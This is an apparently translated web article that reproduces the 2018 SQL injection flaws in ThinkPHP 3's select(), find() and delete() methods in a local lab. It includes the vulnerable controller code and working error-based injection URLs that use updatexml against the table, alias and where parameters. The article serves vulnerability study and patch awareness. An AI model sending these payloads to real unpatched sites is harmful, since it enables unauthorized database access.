Home  >  Article  >  PHP Framework  >  Is there any vulnerability in thinkphp3?

Is there any vulnerability in thinkphp3?

藏色散人
藏色散人Original
2019-08-06 11:31:112670browse

Is there any vulnerability in thinkphp3?

Is there any vulnerability in thinkphp3?

thinkphp3 is vulnerable, but on Thursday, August 23, 2018 at 11:25 Beijing time, the tp team made a security update for the thinkphp 3 series that has stopped updating. After analysis , this update corrects multiple SQL injection risks caused by the select(), find(), and delete() methods that may pass in array type data.

0x01 Vulnerability Recurrence

Download source code: git clone https://github.com/top-think/thinkphp.git

Use the git checkout command to roll back the version to the last commit: git checkout 109bf30254a38651c21837633d9293a4065c300b

Use integrated tools such as phpstudy to build thinkphp and modify the apache configuration file httpd-conf

DocumentRoot "" is the directory where thinkphp is located.

Is there any vulnerability in thinkphp3?

Restart phpstudy, access 127.0.0.1, and output the thinkphp welcome message, indicating that thinkphp is running normally.

Is there any vulnerability in thinkphp3?

Build a database, the database is tptest, the table is user, there are three fields in the table, id, username, pass

Is there any vulnerability in thinkphp3?

Modify the Application\Common\Conf\config.php configuration file and add database configuration information.

Is there any vulnerability in thinkphp3?

Add the following code in Application\Home\Controller\IndexController.class.php:

public function test()
    {
       $id = i('id');
       $res = M('user')->find($id);
       //$res = M('user')->delete($id);
       //$res = M('user')->select($id);
    }

For the select() and find() methods, there are There are many places to note. Here we mainly list three tables, alias, and where. For more, please track the various parseXXX methods of parseSql by yourself. Visual inspection is feasible, such as having, group, etc.

table:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
alias:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

Is there any vulnerability in thinkphp3?

The same is true for the delete() method. Here are three rough examples: table, alias, and where. But when using table and alias, you must also ensure where Not empty (the detailed reasons will be discussed later)

where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
alias: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
table: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1

Is there any vulnerability in thinkphp3?

You can roughly know by comparing commits on github that this update is mainly in ThinkPHP/Library/Think/Model In the .class.php file, the three functions delete, find, and select have been modified.

The above is the detailed content of Is there any vulnerability in thinkphp3?. For more information, please follow other related articles on the PHP Chinese website!

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn